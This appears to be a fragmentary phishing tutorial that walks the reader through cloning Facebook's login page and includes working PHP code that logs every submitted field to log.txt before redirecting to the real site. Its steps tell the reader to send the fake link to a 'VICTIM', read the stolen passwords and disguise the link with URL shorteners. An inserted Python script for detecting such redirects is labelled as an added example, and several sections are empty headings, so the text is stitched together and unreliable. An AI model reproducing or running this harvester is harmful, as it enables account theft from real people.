History of Phishing
What is Phishing?
Types of Phishing
Why is it called a Social Engineering Technique?
Steps to perform Phishing
Tricks to perform Phishing
Precautions against Phishing Attempts
History of Phishing
In actuality, the phishing victim later discovers his personal identity and
other vital information have been stolen and exposed.
Types of Phishing
Desktop Phishing
Spear Phishing
SMS Phishing
Voice Phishing: Voice phishing is currently the latest type of phishing. Not
all phishing attacks require a fake website. Messages that claimed to be
from a bank told users to dial a phone number regarding problems with
their bank accounts. Once the phone number (owned by the phisher, and
provided by a Voice over IP service) was dialled, prompts told users to
enter their account numbers and PIN. Vishing (voice phishing) sometimes
uses fake caller-ID data to give the appearance that calls come from a
trusted organization.
Phishing – A Social Engineering Technique
In order to create a fake page, you need to go to the target web page. For
example, if you want to phish someone’s Facebook account username and
password, you need to go to https://www.facebook.com and save
the web page, either by pressing Ctrl + S or by right-clicking on the screen and
choosing the Save Page As option.
Now you need to open it in any text editor, such as Notepad or Notepad++.
Steps to perform Phishing
Copy the PHP code given below into Notepad and save it as login.php
<?php
header ('Location: https://www.facebook.com/login.php?login_attempt=1');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 3: Upload these 2 files, i.e. the fake page and the phishing script,
to some server.
Step 4: Send the fake page link to the VICTIM via an email or any other medium.
Step 5: As soon as the VICTIM opens your page and enters the credentials,
the credentials are logged on your server and a new file named
log.txt is generated at the following location.
File Manager > public_html > log.txt
Step 6: Open log.txt to see the VICTIM’s username and password.
That’s it, you have phished a VICTIM successfully.
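The script above accepts the form POST and immediately redirects the browser to the real login page, and that pairing is visible in web proxy logs. The following detection sketch is an added example, not part of the original document; the JSON log fields, the sample records and the PROTECTED list are constructed assumptions.

```python
import json
from urllib.parse import urlsplit

# Assumption: domains whose login pages the organisation wants to protect.
PROTECTED = {"facebook.com"}

# Constructed proxy records (JSON lines); the field names are hypothetical.
SAMPLE_LOG = """\
{"user":"alice","method":"POST","host":"www.facebook.com","path":"/login.php","status":302,"location":"https://www.facebook.com/home.php"}
{"user":"bob","method":"POST","host":"fb-secure.example","path":"/login.php","status":302,"location":"https://www.facebook.com/login.php?login_attempt=1"}
{"user":"carol","method":"GET","host":"news.example","path":"/out","status":302,"location":"https://www.facebook.com/somepage"}
{"user":"dave","method":"POST","host":"facebook.com.account.example","path":"/l.php","status":303,"location":"https://facebook.com/login.php"}
not-json garbage line
"""

REDIRECTS = (301, 302, 303, 307, 308)

def in_protected(host):
    """True if host is a protected domain or a true subdomain of one."""
    host = (host or "").lower().rstrip(".")
    # The leading dot stops lookalikes such as facebook.com.account.example.
    return any(host == d or host.endswith("." + d) for d in PROTECTED)

def is_harvest_redirect(rec):
    """POST to a non-protected host answered by a redirect to a protected one."""
    if rec.get("method") != "POST" or rec.get("status") not in REDIRECTS:
        return False
    # Relative or missing Location headers yield hostname None and never match.
    target = urlsplit(rec.get("location") or "").hostname
    return in_protected(target) and not in_protected(rec.get("host"))

def scan(log_text):
    """Return (user, host) pairs for every record matching the pattern."""
    hits = []
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than abort the scan
        if isinstance(rec, dict) and is_harvest_redirect(rec):
            hits.append((rec.get("user"), rec.get("host")))
    return hits

if __name__ == "__main__":
    for user, host in scan(SAMPLE_LOG):
        print(f"possible credential harvest: user={user} posted to {host}")
```

Each hit names a user whose password should be reset and a host to block and report.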
Tricks to perform Phishing
Below are some real-time emails that were recorded as phishing attempts
on some popular sites.
You can also do it in the same way.
Our systems have detected an unusual high volume email traffic from this email address with the
data listed below:
You can also shorten your fake page link, i.e. the phishing link,
by using a URL shortening service.
Below are some good URL Shorteners.